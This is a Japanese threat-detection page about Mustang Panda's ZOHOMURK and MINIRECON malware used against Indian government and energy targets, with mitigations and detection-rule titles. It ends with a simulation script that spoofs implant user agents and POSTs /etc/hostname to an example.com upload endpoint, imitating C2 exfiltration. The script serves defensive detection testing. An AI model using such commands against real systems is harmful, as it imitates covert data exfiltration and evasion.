ムスタングパンダがZOHOMURKとMINIRECONをインド政府およびエネルギー部門に対して使用
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Mustang Pandaは、インドの政府および水力発電セクターを標的とした諜報活動を行っています。このグループは、SHARDLOADER、MINIRECON、ZOHOMURKを含む更新されたマルウェアツールキットを使用しています。注目すべき技術の1つは、コマンド・アンド・コントロールやデータ流出にZoho WorkDriveを悪用することです。
調査
Acronis TRUは、インドと台湾の協力に関連したスピアフィッシングの疑似餌を使用する2つの並行キャンペーンを特定しました。研究者たちは、正当なSolid PDF Creatorバイナリを介したDLLサイドローディングを発見し、新しいZOHOMURKとMINIRECONインプラントを分析しました。また、この調査はCERT-Inと連携して行われ、防御措置を支援しました。
緩和策
組織は、クラウドプラットフォームに関連する異常な活動、特にZoho WorkDriveの不正使用を監視する必要があります。EDRおよびXDRソリューションは、DLLサイドローディングや疑わしいレジストリに基づく持続性を検出するように調整すべきです。クラウドサービスへのHTTPSまたはWebSocket接続を行う非ブラウザプロセスへの可視性も非常に重要です。
対応策
この活動が検出された場合、影響を受けたシステムは直ちに隔離して、クラウドAPIを通じたさらなるデータ流出を阻止する必要があります。調査者は、ステージングパスなどで法科学分析を行うべきです。 C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCacheレジストリの実行キーとスケジュールされたタスクも、不正に持続性を持つものがないか確認する必要があります。
攻撃フロー
検出
疑わしいスケジュールされたタスク(監査経由)
表示
可能な持続性のポイント [ASEPs – ソフトウェア/NTUSER ハイブ](レジストリイベント経由)
表示
公共ユーザープロファイル内の疑わしいファイル(ファイルイベント経由)
表示
Mustang Panda MINIRECONおよびZOHOMURK C2通信の検出 [Windows ネットワーク接続]
表示
Mustang Panda ZOHOMURK コマンド・アンド・コントロール検出 [プロキシ]
表示
インドのセクター攻撃におけるMustang Panda持続性メカニズムの検出 [Windows レジストリエベント]
表示
シミュレーション実行
前提条件:テレメトリーおよびベースラインのプリフライトチェックが合格している必要があります。
根拠:このセクションは、検出ルールをトリガーするように設計された敵対者の技術(TTP)の正確な実行を詳細に説明しています。コマンドとナラティブは、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。抽象的または無関係な例は誤診につながります。
-
攻撃の説明とコマンド: 敵対者は既に足場を確立し、コマンド・アンド・コントロール(C2)通信を開始しようとしています。正当な業務トラフィックに偽装するために、ZOHOMURKインプラントはZoho WorkDrive API呼び出しを模倣してコントローラーと通信しようとしています。攻撃者は特定のハードコードされたユーザーエージェント文字列(
Zoho Client/1.0)を使用して特定のネットワークフィルターを通過し、正当なクラウド生産性トラフィックに溶け込むことを期待しています。このアクションは、ターゲットユーザーエージェントを含むプロキシログエントリを生成し、それによって検出ルールをトリガーします。 -
回帰テストスクリプト:
#!/bin/bash # ZOHOMURK C2のユーザーエージェント偽装によるシミュレーション # ターゲット1:Zoho Clientの模倣 echo "[+] ZOHOMURKをシミュレート:Zoho Client/1.0" curl -A "Zoho Client/1.0" http://example.com/api/v1/sync # ターゲット2:IPFetcherの模倣 echo "[+] ZOHOMURKをシミュレート:IPFetcher/1.0" curl -A "IPFetcher/1.0" http://example.com/checkip # ターゲット3:マルチパートPOSTユーザーエージェントの模倣 echo "[+] ZOHOMURKをシミュレート:マルチパートPOST" curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload -
クリーンアップコマンド:
# このネットワークベースのシミュレーションによって、システムに永続的なアーティファクトは作成されません。 # 単にバックグラウンドで実行されているcurlプロセスがないことを確認します。 pkill curl